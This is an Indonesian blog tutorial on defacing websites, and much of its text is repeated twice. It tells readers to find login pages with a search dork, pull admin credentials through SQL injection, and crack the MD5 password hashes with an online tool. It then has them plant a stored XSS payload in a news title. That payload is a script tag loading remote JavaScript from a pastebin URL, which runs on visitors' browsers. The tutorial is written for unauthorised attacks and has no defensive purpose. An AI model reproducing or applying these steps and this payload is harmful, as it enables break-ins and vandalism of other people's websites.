Pada materi sebelumnya sudah dijelaskan mengenai XSS dan juga SQL Injection. Sekarang kita gunakan dua metode tersebut untuk mendeface sebuah website. Biasanya setelah kita login sebagai admin terkadang panel adminnya mempunyai fitur yang sangat terbatas seperti contoh menambahkan berita, galeri dan informasi yang lain. Sekarang kita akan mendeface website dengan dua metode tersebut. SQL Injection digunakan untuk melihat akun admin dan XSS digunakan untuk mengubah tampilan website.
Seperti biasa saya tidak akan memberikan target tertentu. Untuk mencari website-website yang memiliki form login bisa gunakan dork ini.
Tutorial SQL Injection kalian bisa kunjungi materi SQL Injection dan untuk XSS bisa kunjungi materi XSS yang sudah tersedia. Kalau kalian sudah berhasil menemukan username dan password admin, cek terlebih dahulu apakah passwordnya terenkripsi atau tidak, biasanya password di enkripsi dengan MD5. Password yang di enkripsi MD5 bisa kalian dekripsi dengan tools yang beredar di internet salah satunya adalah MD5 Online.
Masukan password yang terenkripsi ke kalam kotak yang disediakan kan klik tombol Decrypt, tunggu hingga proses nya selesai.
Biasanya website terdapat berita atau informasi lain yang dimunculkan di halaman utama website. Nah, itu akan kita jadikan sebagai target deface website tanpa mengubah file indexnya.
Setelah kalian masuk ke panel Admin kalian bisa mengganti atau menambahkan berita dengan disisipkan script deface. Kalian bisa menggunakan script deface dari saya. Masukan payload XSS ke judul berita.
Simpan beritanya dan kunjungi halaman utama website. Jika berhasil website akan berganti tampilan.
Jika ada yang belum dimengerti silahkan tulis dikolom komentar atau kirim pesan pada kontak yang tersedia. Sekian untuk materi kali ini, semoga bermanfaat dan sampai jumpa pada materi berikutnya.
Seperti biasa saya tidak akan memberikan target tertentu. Untuk mencari website-website yang memiliki form login bisa gunakan dork ini.
inurl: login
Tutorial SQL Injection kalian bisa kunjungi materi SQL Injection dan untuk XSS bisa kunjungi materi XSS yang sudah tersedia. Kalau kalian sudah berhasil menemukan username dan password admin, cek terlebih dahulu apakah passwordnya terenkripsi atau tidak, biasanya password di enkripsi dengan MD5. Password yang di enkripsi MD5 bisa kalian dekripsi dengan tools yang beredar di internet salah satunya adalah MD5 Online.
Masukan password yang terenkripsi ke kalam kotak yang disediakan kan klik tombol Decrypt, tunggu hingga proses nya selesai.
Setelah kalian masuk ke panel Admin kalian bisa mengganti atau menambahkan berita dengan disisipkan script deface. Kalian bisa menggunakan script deface dari saya. Masukan payload XSS ke judul berita.
Payload : <script type="text/javascript" src="https://pastebin.com/raw/xqcAm4nU">
Simpan beritanya dan kunjungi halaman utama website. Jika berhasil website akan berganti tampilan.
Jika ada yang belum dimengerti silahkan tulis dikolom komentar atau kirim pesan pada kontak yang tersedia. Sekian untuk materi kali ini, semoga bermanfaat dan sampai jumpa pada materi berikutnya.
0 comments:
Post a Comment